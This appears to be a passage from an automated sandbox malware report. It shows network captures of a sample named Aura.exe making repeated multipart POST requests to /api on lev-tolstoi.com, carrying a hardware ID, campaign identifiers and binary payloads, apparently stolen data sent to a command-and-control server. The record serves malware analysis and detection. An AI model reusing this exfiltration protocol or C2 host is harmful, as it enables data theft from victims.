                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 65 32 4d 51 48 38 50 71 55 43 37 35 6d 61 6e 68 5a 36 76 51 7a 42 44 4c 4e 50 65 77 38 4c 53 45 31 61 65 51 67 57 79 71 6a 69 45 78 4e 6c 70 57 68 4c 68 5a 4f 4c 44 4d 37 38 35 73 6a 4d 33 63 42 4e 5a 7a 37 2f 6a 6b 2f 49 37 63 35 4d 6e 46 5a 62 65 45 4a 54 4d 7a 58 78 6e 4f 39 6c 67 6d 2f 5a 47 67 34 33 4b 74 30 38 6f 64 7a 7a 6a 69 74 76 43 34 68 64 53 73 6d 6f 38 6d 39 73 30 74 49 33 73 49 56 76 2f 31 55 53 44 7a 67 75 2f 32 4c 72 79 64 77 42 71 41 61 37 43 36 38 37 79 47 33 4b 69 61 6a 57 65 30 67 79 30 2b 4d 6c 67 65 32 50 6c 61 4b 50 47 61 6f 4f 68 6b 6f 4e 6a 44 45 63 51 31 2f 2f 61 7a 2f 49 37 49 35 4d 6e 46 53 5a 2b 34 61 42 6f 42 45 41 6d 45 34 52 34 6e 2f 4e 54 33 71 57 79 6d 30 63 38 5a 78 6a 72 38 76 50 53 33 68 64 75 67 6e 59 78 6a 76 6f 77
                                                                                                                                                                                                                                                  Data Ascii: e2MQH8PqUC75manhZ6vQzBDLNPew8LSE1aeQgWyqjiExNlpWhLhZOLDM785sjM3cBNZz7/jk/I7c5MnFZbeEJTMzXxnO9lgm/ZGg43Kt08odzzjitvC4hdSsmo8m9s0tI3sIVv/1USDzgu/2LrydwBqAa7C687yG3KiajWe0gy0+Mlge2PlaKPGaoOhkoNjDEcQ1//az/I7I5MnFSZ+4aBoBEAmE4R4n/NT3qWym0c8Zxjr8vPS3hdugnYxjvow
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 68 48 44 36 6c 41 74 2f 35 79 6e 34 47 47 68 32 4d 6f 51 7a 44 6e 78 73 66 4f 79 67 5a 44 71 30 59 4a 2b 2b 4e 56 71 47 69 74 4c 42 4e 7a 31 66 79 33 2f 31 4c 43 6e 65 65 58 61 79 31 61 59 63 2f 6d 6b 2b 62 47 62 32 61 4f 66 69 6d 57 71 6a 43 63 77 4b 56 63 5a 7a 76 39 53 4a 76 2b 53 72 75 78 71 71 64 72 43 48 63 38 2f 73 50 69 39 75 35 47 51 2f 4e 47 72 62 61 75 61 4b 54 55 77 52 67 32 4b 35 78 41 35 73 4a 4f 6a 71 54 6a 6c 33 73 77 64 78 44 50 38 74 76 6d 78 69 63 4b 72 6c 6f 4a 76 73 35 38 67 50 44 78 62 48 73 48 33 57 44 4c 38 6d 72 33 73 63 72 65 64 69 56 62 48 4b 37 44 75 76 59 71 4f 77 4c 53 53 78 31 65 75 6a 6a 77 77 4e 6c 78 57 31 62 5a 48 59 50 65 59 37 37 45 67 6f 39 4c 4f 46 63 38 79 2b 62 72 77 75 59 44 56 70 5a 65 42 62 4c 4b 4e 4c 44 30 36
                                                                                                                                                                                                                                                  Data Ascii: hHD6lAt/5yn4GGh2MoQzDnxsfOygZDq0YJ++NVqGitLBNz1fy3/1LCneeXay1aYc/mk+bGb2aOfimWqjCcwKVcZzv9SJv+SruxqqdrCHc8/sPi9u5GQ/NGrbauaKTUwRg2K5xA5sJOjqTjl3swdxDP8tvmxicKrloJvs58gPDxbHsH3WDL8mr3scrediVbHK7DuvYqOwLSSx1eujjwwNlxW1bZHYPeY77Ego9LOFc8y+brwuYDVpZeBbLKNLD06
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 68 5a 4c 4c 44 4d 37 2b 70 6e 70 74 7a 4e 48 38 77 38 39 37 4c 76 74 6f 37 43 70 5a 43 4f 61 37 53 4e 4a 7a 59 78 55 52 2f 48 39 46 4d 6e 39 35 75 71 71 53 37 6c 32 74 39 57 6d 48 50 52 75 2f 61 77 30 6f 72 6b 6a 73 74 2f 2b 49 6f 6d 65 32 4d 51 46 73 44 39 56 43 33 7a 6d 36 7a 37 59 61 50 50 78 78 76 4b 49 66 71 39 2b 4c 47 45 33 61 65 58 67 32 32 30 6e 79 4d 37 4f 46 74 57 68 4c 68 5a 4f 4c 44 4d 37 38 70 33 73 39 66 41 47 74 59 34 38 62 58 72 73 5a 6d 51 36 74 47 55 59 61 6e 4e 63 69 30 72 52 78 48 56 74 6b 64 67 39 35 6a 76 73 53 43 6a 31 4d 45 52 78 6a 33 69 73 2f 75 7a 68 74 6d 74 6c 59 31 6c 75 49 6b 75 50 44 35 54 47 73 48 2f 58 53 2f 30 6e 61 48 67 62 2b 57 54 68 78 48 59 63 36 6a 32 33 4b 65 4b 33 4b 6e 52 6d 69 69 68 7a 53 30 33 65 77 68 57 78
                                                                                                                                                                                                                                                  Data Ascii: hZLLDM7+pnptzNH8w897Lvto7CpZCOa7SNJzYxUR/H9FMn95uqqS7l2t9WmHPRu/aw0orkjst/+Iome2MQFsD9VC3zm6z7YaPPxxvKIfq9+LGE3aeXg220nyM7OFtWhLhZOLDM78p3s9fAGtY48bXrsZmQ6tGUYanNci0rRxHVtkdg95jvsSCj1MERxj3is/uzhtmtlY1luIkuPD5TGsH/XS/0naHgb+WThxHYc6j23KeK3KnRmiihzS03ewhWx
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 37 67 71 72 75 64 75 66 6f 78 42 6a 4f 4e 4f 62 32 34 6f 50 48 6b 4b 75 4c 78 54 36 42 6c 47 6f 38 4e 78 42 4f 69 75 31 5a 49 50 65 4f 75 65 35 73 74 4e 62 4b 47 75 49 38 39 36 44 2b 73 34 72 42 72 64 32 4f 61 2f 6a 44 61 6a 77 6a 45 45 36 4b 31 31 6b 32 38 37 75 73 2b 47 6e 6c 6b 34 63 52 31 6e 4f 6f 39 73 50 38 6d 39 4f 30 6b 6f 70 33 68 73 31 79 49 67 55 51 48 64 7a 2f 54 69 50 6d 6e 36 4c 6c 63 5a 75 64 6e 30 4b 53 59 61 4c 6b 72 36 50 4a 7a 35 76 66 78 57 66 34 31 52 4d 69 65 30 5a 57 6b 71 6f 51 59 4f 4c 55 39 36 6b 6e 70 73 2f 56 45 4d 4d 6c 38 2f 48 44 67 71 37 47 72 70 61 56 59 61 2b 43 61 6e 56 37 58 31 61 53 77 52 34 70 39 34 2b 2b 2f 32 32 31 32 6f 63 70 6a 6e 50 6f 39 71 58 38 76 4e 4f 71 6e 34 4a 77 71 63 41 4e 4c 54 46 58 42 73 33 76 55 57
                                                                                                                                                                                                                                                  Data Ascii: 7gqrudufoxBjONOb24oPHkKuLxT6BlGo8NxBOiu1ZIPeOue5stNbKGuI896D+s4rBrd2Oa/jDajwjEE6K11k287us+Gnlk4cR1nOo9sP8m9O0kop3hs1yIgUQHdz/TiPmn6LlcZudn0KSYaLkr6PJz5vfxWf41RMie0ZWkqoQYOLU96knps/VEMMl8/HDgq7GrpaVYa+CanV7X1aSwR4p94++/2212ocpjnPo9qX8vNOqn4JwqcANLTFXBs3vUW
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 34 6d 43 69 7a 64 45 4e 6a 44 76 7a 72 4f 65 43 74 2f 75 6f 6c 34 4a 38 76 34 73 4d 47 33 73 65 56 73 57 34 42 68 6d 77 33 4f 2f 57 4c 75 58 46 68 30 36 41 42 76 4f 34 38 37 75 66 77 65 6d 35 70 6c 79 43 7a 77 59 38 4c 68 49 69 7a 65 68 50 4b 2f 32 59 37 36 63 67 6f 35 32 66 52 6f 35 7a 39 4b 65 39 35 4e 6d 43 2f 38 54 57 4d 65 6a 66 4e 58 55 69 45 41 43 4b 6f 41 78 75 73 49 62 76 73 53 44 69 33 74 55 45 78 6a 44 6d 74 62 71 43 74 2f 65 71 6c 6f 52 77 71 4a 6f 6c 42 51 56 46 46 63 54 32 57 54 62 68 31 4f 47 70 62 2b 57 46 2f 6c 61 49 63 38 2f 34 76 61 54 4a 69 4f 53 6b 68 6d 69 32 69 6a 77 71 64 6e 63 59 7a 66 6c 49 4d 4f 65 62 37 36 63 67 6f 35 32 66 52 49 35 7a 39 4b 65 39 35 4e 6d 43 2f 38 54 57 4d 65 6a 66 4e 58 55 69 45 41 43 4b 6f 41 78 75 73 49 62
                                                                                                                                                                                                                                                  Data Ascii: 4mCizdENjDvzrOeCt/uol4J8v4sMG3seVsW4Bhmw3O/WLuXFh06ABvO487ufwem5plyCzwY8LhIizehPK/2Y76cgo52fRo5z9Ke95NmC/8TWMejfNXUiEACKoAxusIbvsSDi3tUExjDmtbqCt/eqloRwqJolBQVFFcT2WTbh1OGpb+WF/laIc8/4vaTJiOSkhmi2ijwqdncYzflIMOeb76cgo52fRI5z9Ke95NmC/8TWMejfNXUiEACKoAxusIb
                                                                                                                                                                                                                                                  2024-12-27 22:47:33 UTC1369INData Raw: 73 76 45 56 6f 35 7a 2f 50 61 6c 2f 49 6a 61 74 4a 79 4b 59 66 53 4b 4d 44 78 37 48 6c 62 45 75 41 5a 67 38 5a 36 2f 35 47 2b 69 6b 63 45 59 7a 6e 50 76 2b 4f 54 38 6e 35 44 38 77 73 73 6d 71 73 31 79 65 33 78 54 42 4e 6a 2b 58 54 62 7a 30 35 48 58 54 62 66 61 31 78 57 43 41 76 32 79 36 36 6d 4b 77 4b 4f 76 75 30 75 71 69 6a 6f 34 65 57 45 41 79 66 68 51 4a 37 44 61 37 2f 45 67 2f 5a 33 71 42 4d 63 6a 38 2f 61 7a 2f 49 57 51 2f 4e 47 49 64 4c 2b 64 4b 58 63 38 53 68 47 4b 35 78 41 35 73 49 4c 76 73 54 50 72 6e 64 56 57 6d 48 4f 33 75 50 43 39 69 74 36 6e 67 35 64 67 75 35 73 70 66 41 56 75 4f 39 6a 2f 54 69 4f 79 70 61 4c 74 64 72 44 65 31 78 48 2b 44 64 32 6b 2b 71 79 4b 6b 6f 69 57 69 47 71 47 73 78 30 71 50 45 42 55 37 50 74 49 49 37 44 61 37 2f 45 67
                                                                                                                                                                                                                                                  Data Ascii: svEVo5z/Pal/IjatJyKYfSKMDx7HlbEuAZg8Z6/5G+ikcEYznPv+OT8n5D8wssmqs1ye3xTBNj+XTbz05HXTbfa1xWCAv2y66mKwKOvu0uqijo4eWEAyfhQJ7Da7/Eg/Z3qBMcj8/az/IWQ/NGIdL+dKXc8ShGK5xA5sILvsTPrndVWmHO3uPC9it6ng5dgu5spfAVuO9j/TiOypaLtdrDe1xH+Dd2k+qyKkoiWiGqGsx0qPEBU7PtII7Da7/Eg


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.449737104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:35 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=NZT99NLH0EXMQ0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 18144
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:35 UTC15331OUTData Raw: 2d 2d 4e 5a 54 39 39 4e 4c 48 30 45 58 4d 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 38 32 30 32 33 46 42 38 46 33 39 44 34 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 4e 5a 54 39 39 4e 4c 48 30 45 58 4d 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 5a 54 39 39 4e 4c 48 30 45 58 4d 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 0d 0a 2d 2d 4e 5a 54
                                                                                                                                                                                                                                                  Data Ascii: --NZT99NLH0EXMQ0Content-Disposition: form-data; name="hwid"4D582023FB8F39D4C0B9CBDD268CC7CD--NZT99NLH0EXMQ0Content-Disposition: form-data; name="pid"2--NZT99NLH0EXMQ0Content-Disposition: form-data; name="lid"BVnUqo--@hitok4111--NZT
                                                                                                                                                                                                                                                  2024-12-27 22:47:35 UTC2813OUTData Raw: e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11
                                                                                                                                                                                                                                                  Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                                                                                                                                                                                                  2024-12-27 22:47:36 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=5rg29f2m03n8tre3vb6rtmdvh4; expires=Tue, 22 Apr 2025 16:34:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GbBxxCzLEDiqXs%2BmYq%2BC%2FYLUrhNcVDrpDX66MFltfRUPbgew%2BYhoQfA8EiS3W1VvyLKSmD7puEBasp1YQHjwZkhvLo2qKjpH8%2Fgp65jq%2BusqACjXtLcBekHaHzAGHN7sG0U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cda6f1d9b422d-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1633&rtt_var=626&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19101&delivery_rate=1788120&cwnd=232&unsent_bytes=0&cid=e5232b48f0f194f8&ts=965&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:47:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:47:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.449738104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:37 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=QGUKJY56F4XQM
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8759
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:37 UTC8759OUTData Raw: 2d 2d 51 47 55 4b 4a 59 35 36 46 34 58 51 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 38 32 30 32 33 46 42 38 46 33 39 44 34 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 51 47 55 4b 4a 59 35 36 46 34 58 51 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 47 55 4b 4a 59 35 36 46 34 58 51 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 0d 0a 2d 2d 51 47 55 4b 4a 59
                                                                                                                                                                                                                                                  Data Ascii: --QGUKJY56F4XQMContent-Disposition: form-data; name="hwid"4D582023FB8F39D4C0B9CBDD268CC7CD--QGUKJY56F4XQMContent-Disposition: form-data; name="pid"2--QGUKJY56F4XQMContent-Disposition: form-data; name="lid"BVnUqo--@hitok4111--QGUKJY
                                                                                                                                                                                                                                                  2024-12-27 22:47:38 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=kacc170c92voutnerndq1uml9i; expires=Tue, 22 Apr 2025 16:34:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2BXoRxx80XqzXAZLGi%2BkiTurkGd%2FKH0TXZHE4AcI1IIcbNotD7g8RrRt%2FBGvqx8xUNNL6SvTwpNmdqXKAnQt8NtR2%2BX24gc6Qg4pJ8cxKY28IDwHGZKjRJvOk3PkMCL4UM0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cda7debf541d8-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1540&rtt_var=603&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2835&recv_bytes=9692&delivery_rate=1778319&cwnd=218&unsent_bytes=0&cid=4b67dee851888b48&ts=878&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:47:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:47:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.449739104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:40 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=AE5L39HWTN
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 20394
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:47:40 UTC15331OUTData Raw: 2d 2d 41 45 35 4c 33 39 48 57 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 35 38 32 30 32 33 46 42 38 46 33 39 44 34 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 41 45 35 4c 33 39 48 57 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 45 35 4c 33 39 48 57 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 0d 0a 2d 2d 41 45 35 4c 33 39 48 57 54 4e 0d 0a 43 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: --AE5L39HWTNContent-Disposition: form-data; name="hwid"4D582023FB8F39D4C0B9CBDD268CC7CD--AE5L39HWTNContent-Disposition: form-data; name="pid"3--AE5L39HWTNContent-Disposition: form-data; name="lid"BVnUqo--@hitok4111--AE5L39HWTNCon
                                                                                                                                                                                                                                                  2024-12-27 22:47:40 UTC5063OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb
                                                                                                                                                                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                                                                                                                                                                                  2024-12-27 22:47:41 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:47:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=j0a0asv0e1tahtreos6ut7jmp1; expires=Tue, 22 Apr 2025 16:34:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygSCO9gdUNHZhlwTI4MmKthhyft%2BnUutuwMBG0rNuP2MgEphalXUQHr20Ru8sd8YHA%2BMZN2XXymFJ1t04yHubK01pQTWs4IXkJHFk4X1ydZXDxk8a%2FiWEeQnyJgFM0qQcHo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8cda8c58a1429d-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1549&rtt_var=600&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21347&delivery_rate=1795817&cwnd=246&unsent_bytes=0&cid=25e1bf3161f68979&ts=974&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:47:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:47:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.449741104.21.66.864437412C:\Users\user\Desktop\Aura.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:47:42 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=Y3EEH26WZIUZQ6OEFK
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 1258
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
